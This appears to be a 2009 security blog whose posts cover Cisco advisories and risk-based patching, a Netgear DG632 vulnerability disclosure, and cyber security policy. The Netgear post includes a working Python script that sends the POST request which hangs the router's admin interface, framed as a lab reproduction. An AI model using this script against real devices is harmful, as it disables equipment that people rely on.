Tuesday, June 30, 2009

Cisco Security Advisories

Wow! Late June saw a lot of action on the Cisco front when it comes to security advisories. Over the course of 3 days, June 24th, 25th and 26th, there were 10 advisories. Of these, 2 were new while the other 8 were updates to advisories published on March 25th of this year. The two new advisories were focused on vulnerabilities in Cisco's physical security technologies.

Cisco Physical Access Gateway
The first is a denial of service vulnerability in the Cisco Physical Access Gateway product. An attacker sending specially crafted packets can create a memory leak. If this happens, connected door hardware (card readers, locks, etc.) may not function, causing the door to remain locked or to remain open. Affected products include those running software versions prior to 1.1. There are no workarounds; however, free software updates are available. Additional detail about this vulnerability can be found at - http://www.cisco.com/warp/public/707/cisco-sa-20090624-gateway.shtml
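
If you want to know whether you're exposed, the first step is simply comparing the software version each gateway reports against the 1.1 threshold from the advisory. Here's a minimal sketch of that check - the inventory data is purely illustrative, and how you actually collect the version strings (CLI, SNMP, an asset database) is up to you.

```python
# Minimal sketch: flag Physical Access Gateways reporting a software
# version prior to 1.1 (the versions the advisory lists as affected).
# The inventory below is hypothetical; populate it from your own records.

def is_affected(version: str, first_fixed: str = "1.1") -> bool:
    """Return True if `version` sorts before the first fixed release."""
    as_tuple = lambda v: tuple(int(part) for part in v.split("."))
    return as_tuple(version) < as_tuple(first_fixed)

inventory = {
    "gw-lobby-01": "1.0.2",   # placeholder names and versions
    "gw-dock-02": "1.1.0",
}

for name, version in inventory.items():
    status = "update needed" if is_affected(version) else "ok"
    print(f"{name}: {version} -> {status}")
```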

As a penetration tester, physical security is paramount and the closer I can get to your critical assets, the better. If I can open your locked doors using some crafted packets, I can access your facility. At a minimum, I can plug in to your network, and that's bad. The flip side is also bad. If I can cause your doors to lock and stay locked, I can stop security guards from making their rounds and stop people from getting to work. If these locks are used for egress as well as ingress, there may be life safety issues as well.

Cisco Video Surveillance Stream Manager
The next advisory relates to the Cisco Video Surveillance Stream Manager firmware for the Cisco Video Surveillance Services Platforms and Cisco Video Surveillance Integrated Services Platforms. A crafted packet can cause a reboot of the system. There is also a vulnerability in the Cisco Video Surveillance 2500 Series IP Camera that could allow an authenticated user to view any file on a vulnerable camera. Cisco has released free software to remediate these vulnerabilities. Detailed information can be found at - http://www.cisco.com/warp/public/707/cisco-sa-20090624-video.shtml

If you have deployed these technologies then you must have determined that video surveillance is an important component of your security program. The DoS vulnerability in Cisco Video Surveillance Stream Manager could result in an extended DoS condition which would effectively blind you. The vulnerability in the cameras could allow a non-privileged user to gain privileged access.

Updates
As I stated previously, the remaining issues are updates to previous advisories. They all relate to Cisco IOS and include a vulnerability with Mobile IP and Mobile IPv6, a cTCP DoS vulnerability, a Session Initiation Protocol DoS vulnerability, a crafted UDP packet vulnerability that affects several IOS features, vulnerabilities with WebVPN and SSLVPN, a privilege escalation vulnerability in Cisco IOS secure copy and a crafted TCP packet vulnerability that affects multiple IOS features. Links to additional information have been included below.

http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml

http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml

http://www.cisco.com/warp/public/707/cisco-sa-20090325-udp.shtml

http://www.cisco.com/warp/public/707/cisco-sa-20090325-sip.shtml

http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml

http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml

http://www.cisco.com/warp/public/707/cisco-sa-20090325-ip.shtml

http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml

Summary
Now that I've thrown a bunch of information at you, I want to put all of this in terms of risk and risk assessment. When I started writing this post, I had a couple of statements about patching and installing updates along the lines of "Please patch". I pulled them out because I realized that I was going against the normal advice that I give. Should you patch or upgrade your software to fix these problems? The short answer is probably yes, but that is not the whole story. Simply deploying each and every patch because the vendor says it is a problem is not risk-based security.

I recommend that you take a look at these vulnerabilities. If you are using this technology and you are affected by the vulnerability, you need to ask yourself "what would the impact be to the business if....". For example, the vulnerability with the Cisco IP Cameras would allow an authenticated but non-privileged user to gain privileged access. Do you have non-privileged users? If not, does it make sense to install the patch? If you do have non-privileged users, what would happen if they gained privileged access? What do you believe is the likelihood that that particular vulnerability could be expanded to allow unauthenticated users access?

I understand that this seems more complicated than simply deploying the patch, and in some cases it may be, but consider an environment with 500 cameras. How many man-hours will be required to push out the patch to that many cameras? If it takes 1 hour to deploy each patch, that's 500 man-hours. Assuming a simple per man-hour cost of $100, that is a cost to deploy the patch of $50,000. Would the potential impact of the vulnerability cost the organization more or less than $50,000? What about other technologies? Deploying a patch on a purpose-built device like a camera may have little downside, but what about deploying a similar patch to a critical application or a core operating system? Way back when SQL Slammer came out, I had a customer who relied on SQL databases. They were unaffected by the worm, but the patch caused days of downtime because it broke other applications.
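
To make that concrete, here's a back-of-the-envelope sketch of the 500-camera math. Every number in it is a placeholder taken from the example above - swap in your own device counts, labor rates and impact estimates, and treat the annualized loss figure as a rough guess, not a precise prediction.

```python
# Back-of-the-envelope comparison of patch deployment cost versus the
# estimated impact of leaving the vulnerability in place. All numbers
# are placeholders from the example in the text.

devices = 500            # cameras to patch
hours_per_device = 1.0   # deployment effort per camera
hourly_rate = 100.0      # loaded cost per man-hour

deployment_cost = devices * hours_per_device * hourly_rate

# Rough annualized loss expectancy: estimated cost of one incident
# times how many times per year you expect it to happen.
single_loss_expectancy = 75_000.0   # hypothetical impact of one incident
annual_rate_of_occurrence = 0.5     # hypothetical: once every two years
annual_loss_expectancy = single_loss_expectancy * annual_rate_of_occurrence

print(f"Cost to deploy the patch:   ${deployment_cost:,.0f}")
print(f"Annualized loss expectancy: ${annual_loss_expectancy:,.0f}")
if annual_loss_expectancy > deployment_cost:
    print("The patch looks justified on cost alone.")
else:
    print("The patch may not be worth it on cost alone.")
```

The arithmetic isn't the point; the point is forcing yourself to write down an impact estimate before you commit 500 man-hours.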

I know I am oversimplifying things, but the concept is sound. When it comes to security, it is important to understand the potential negative impact to the business, the likelihood of a problem and the costs/risks associated with remediation.


Monday, June 15, 2009

Netgear Vulnerability - Disclosure Notification

Today the members of the Bugtraq mailing list received a notification about a vulnerability in the Netgear DG632 router. The text of this email reads as follows:

Product Name: Netgear DG632 Router
Vendor: http://www.netgear.com
Date: 15 June, 2009
Author: tom@tomneaves.co.uk
Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt
Discovered: 18 November, 2006
Disclosed: 15 June, 2009

I. DESCRIPTION
The Netgear DG632 router has a web interface which runs on port 80. This allows an admin to login and administer the device's settings. However, a Denial of Service (DoS) vulnerability exists that causes the web interface to crash and stop responding to further requests.

II. DETAILS
Within the "/cgi-bin/" directory of the administrative web interface exists a file called "firmwarecfg". This file is used for firmware upgrades. A HTTP POST request for this file causes the web server to hang. The web server will stop responding to requests and the administrative interface will become inaccessible until the router is physically restarted.

While the router will still continue to function at the network level, i.e. it will still respond to ICMP echo requests and issue leases via DHCP, an administrator will no longer be able to interact with the administrative web interface.

This attack can be carried out internally within the network, or over the Internet if the administrator has enabled the "Remote Management" feature on the router.

Affected Versions: Firmware V3.4.0_ap (others unknown)

III. VENDOR RESPONSE
12 June, 2009 - Contacted vendor.
15 June, 2009 - Vendor responded. Stated the DG632 is an end of life product and is no longer supported in a production and development sense, as such, there will be no further firmware releases to resolve this issue.

IV. CREDIT
Discovered by Tom Neaves


This posting elicits so many comments that I don't really know where to start, so I've tried to break things down a bit to make the discussion easier to follow.

Vulnerability Severity
First I'd like to address the perceived severity of this vulnerability. It is a denial of service attack against a platform that is most commonly used in home or SOHO environments. This combination means that most mid-sized or larger organizations will likely pay little attention to it. That is a mistake for a few reasons. First, and speaking to small, medium and large organizations alike, you may not use SOHO devices but your users do, and they, in turn, connect to your network. This may be via VPN (through the SOHO router), directly using various protocols, or simply by bringing their laptop from their vulnerable home environment to your "protected" work environment. In short, problems with these devices affect you directly.

Now you may say that this is "just" a DoS problem and isn't going to have an effect. At a minimum, it can affect the productivity of your users. Let's consider an extreme situation - you have a user who is working on a proposal that needs to be turned in on a specific date and time. If their router gets nailed, it may delay the proposal, causing you to lose the business. From a more day-to-day perspective, many organizations allow teleworking. If those workers cannot connect to the business network, their productivity will be impacted, costing your organization money. If your corporate network, or even a single switch on that network, went down, you'd ensure the problem was addressed ASAP. From the perspective of a teleworker, a DoS attack against their SOHO router is exactly the same as the loss of a corporate switch.

Finally, DoS attacks have a way of turning into other types of attacks - possibly allowing the attacker to gain control over the SOHO router. If that happens, it results in a whole new set of problems for businesses with users who rely on these systems.

Vulnerability Disclosure
OK, now that we've covered the fact that we should care about this kind of problem, I want to talk a bit about vulnerability disclosure. In this case, the problem was identified in November of 2006 and was posted on Bugtraq on June 15th of 2009 - 2 years and 7 months later. This means that people have been using vulnerable equipment for all that time without knowing it or having any ability to do something about it. That, to me, is a problem. Even now, because the product is "end of life", there is no patch available - the only fix is purchasing a new box. Again, a scary situation.

I don't want to come across as an alarmist. The issues affecting this particular device are unlikely to represent a significant security risk to any organization, but this problem of vulnerability disclosure is multiplied throughout the industry on virtually every single technology in existence, making it a situation that is relevant to everyone. Now comes the point where I outline a bunch of questions with few answers:

Security researchers spend time "hacking" technology. By hacking, I'm referring to the term in the original context, not the media-driven "attacker" definition. These researchers hack technology for a variety of reasons. It may be part of an authorized penetration test or they may work for a company with a vested interest in vulnerability identification (e.g. a security product vendor, etc.). Often, they just do it for fun. In any case, they discover a vulnerability. This leads them to the first question. Do they notify the vendor, disclose the problem to the public, sell it to the highest bidder......?

If they notify the vendor, they may get a positive response. They may also get brushed off and ignored. They may get criticized or, in rare situations, they may be the target of legal action for "illegal reverse engineering" or some similar "crime". In any of these cases, vendor notification resulting in positive, short-term action by the vendor is the exception rather than the rule, leaving the users of the technology vulnerable and ignorant.

If they decide to publish the problem on the Internet, making it available to the public, they will likely be contacted by the vendor and/or the vendor's lawyers. The public, if they are made aware of the problem, may be able to implement some controls to reduce their risk level, but the security researcher is also putting their discovery in the hands of the bad guys. In effect, they take off the white hat and put on the grey one.

There are also organizations out there who will buy vulnerabilities. This puts some money in the pockets of the researchers but comes really close to "black hat" work.

This is a bit of a sticky situation and gets more so when you look at the concept of pay. Many vulnerability researchers are either independent consultants or do this type of work as a hobby in addition to their normal 9-to-5. They spend countless hours performing quality assurance for some vendor for free. When they do identify something and turn it in to the vendor, the vendor in turn has the opportunity to make their product better. Shouldn't the researchers receive some compensation for the QA work that should have been done by the vendor in the first place? Like I said, this is a sticky subject.

Attack Vectors
The last thing I want to talk about is the way this vulnerability can be attacked. According to the posting - "This attack can be carried out internally within the network, or over the Internet if the administrator has enabled the "Remote Management" feature on the router." This seems to imply that if "Remote Management" has not been enabled, this attack is not exploitable from the Internet. While I haven't tested it, I would suspect that Cross-site scripting (XSS) and Cross-site request forgery (CSRF) attacks may also be used to attack the system even if direct external access is not possible.
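
For what it's worth, the direct, on-network case is trivial to reproduce - it's a single POST. The sketch below is only for a DG632 you own on an isolated lab network (the LAN address is a placeholder), because per the advisory the web interface will hang until the router is power-cycled. The XSS/CSRF angle is pure speculation on my part and isn't demonstrated here.

```python
# Minimal sketch: reproduce the reported DoS against a DG632 you own on a
# lab network. Per the advisory, a single HTTP POST to /cgi-bin/firmwarecfg
# hangs the web interface until the router is power-cycled, so do NOT point
# this at a device anyone relies on. The address below is a placeholder.

import urllib.request

ROUTER = "http://192.168.0.1"            # placeholder LAN address
TARGET = ROUTER + "/cgi-bin/firmwarecfg"

try:
    # An empty POST body is enough, according to the advisory.
    with urllib.request.urlopen(TARGET, data=b"", timeout=10) as resp:
        print(f"Web interface responded (HTTP {resp.status}); "
              "this unit may not be affected.")
except OSError as exc:  # covers URLError, timeouts and connection errors
    print(f"No usable response ({exc}); a hung interface matches the "
          "reported denial of service.")
```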


Tuesday, June 9, 2009

New Podcast

I have just taken my first step into podcasting. In this case, I recorded a discussion about the 10 most dangerous security mistakes I see organizations making when I conduct security assessments. Unfortunately, these mistakes occur far too often and make real security exceptionally difficult. I'll apologize in advance for the quality of the audio editing. I'll get better. I promise.

Wednesday, June 3, 2009

Cyber Security Czar

The White House continues to talk about creating a cyber security coordinator or cyber security czar. Comments from the administration talk about the threat of cyber attacks on our critical infrastructure and of cyber terrorism. My first response - FINALLY! Finally someone is taking the threat seriously. That said, I do not understand what a cyber security czar would actually do.

Many of the articles I have read on the subject talk about the administration's "plan to keep government and commercial information on the Internet safe from cyber criminals or terrorists." They talk about forming partnerships with state and local governments as well as with the private sector and about focusing on training and education. These are all good things but they won't really help make things more secure.

The only way for the federal government to make things more secure is to pass laws or set policy that everyone must comply with. Education won't do it because there are too many organizations that, as a result of ignorance, incompetence or arrogance, won't do the right things. That's why the government has put in place regulations like HIPAA, 21 CFR Part 11, GLBA and Sarbanes-Oxley. That's why the credit card companies put in place PCI DSS. The problem is that these measures just don't work. The minute you think you have created a checklist of minimum mandatory requirements, you have really created the only list of requirements that many organizations will follow. You have also given the bad guys a template of what your security will look like. In effect, you have made security weaker.

Federal regulations and PCI have taken the wrong approach when it comes to cyber security. This is because they are trying to define the controls that need to be put in place. Unfortunately, information technology is too complex, companies are too diverse and the threat landscape is too dynamic for that to work. The minute you define a control requirement, bad guys find a way around it. The regulations then have to change but that process takes much too much time. Control focused regulatory requirements also create the impression that compliance equals security. That is simply not the case.

So, if the current regulatory requirements are the wrong approach, what is the right one? I'm glad you asked. The short answer is - responsibility. Organizations should be held responsible for the results of their security measures, not for the measures themselves. If an organization has really bad security but never suffers a breach or compromise, is there a problem? If an organization is 100% compliant with all regulations but suffers a compromise that discloses credit card numbers and results in identity theft for thousands, did being compliant help? The answers to these questions should be self-evident. Unfortunately, our current regulatory climate would praise the second organization while punishing the first.

My thoughts are simple. Hold organizations accountable for effectively securing sensitive data - or more specifically, data that, if disclosed, altered or destroyed, would negatively affect others. Many of the various state privacy laws do this. Let organizations secure their environments as they see fit but hold them accountable for failure. It doesn't take a cyber security czar or a Cybersecurity Act of 2009 to do this. It takes a couple of things. First, it requires a national definition of what "sensitive" data is. This list doesn't need to be that large but would include personal information that could be used for identity theft, personal medical records, personal financial records (including credit card data), classified government information and the like. Once this definition has been established, two things need to happen: a law needs to be passed that would result in penalties should these data be disclosed, and a law needs to be passed (perhaps an expansion of the Computer Fraud and Abuse Act) that makes it a crime to access these data without authorization.

What would the effect of this be? Of course I don't know for sure, but here's my guess. Nothing would happen initially, until the first few public cases of fines or other penalties levied against organizations who let their sensitive data be compromised hit the nightly news. This would serve as a wake-up call (hopefully), making organizations approach security as a matter of risk management rather than as a checkbox that needs to be checked. Would it work? I don't know, but I believe it would be better than what is happening today.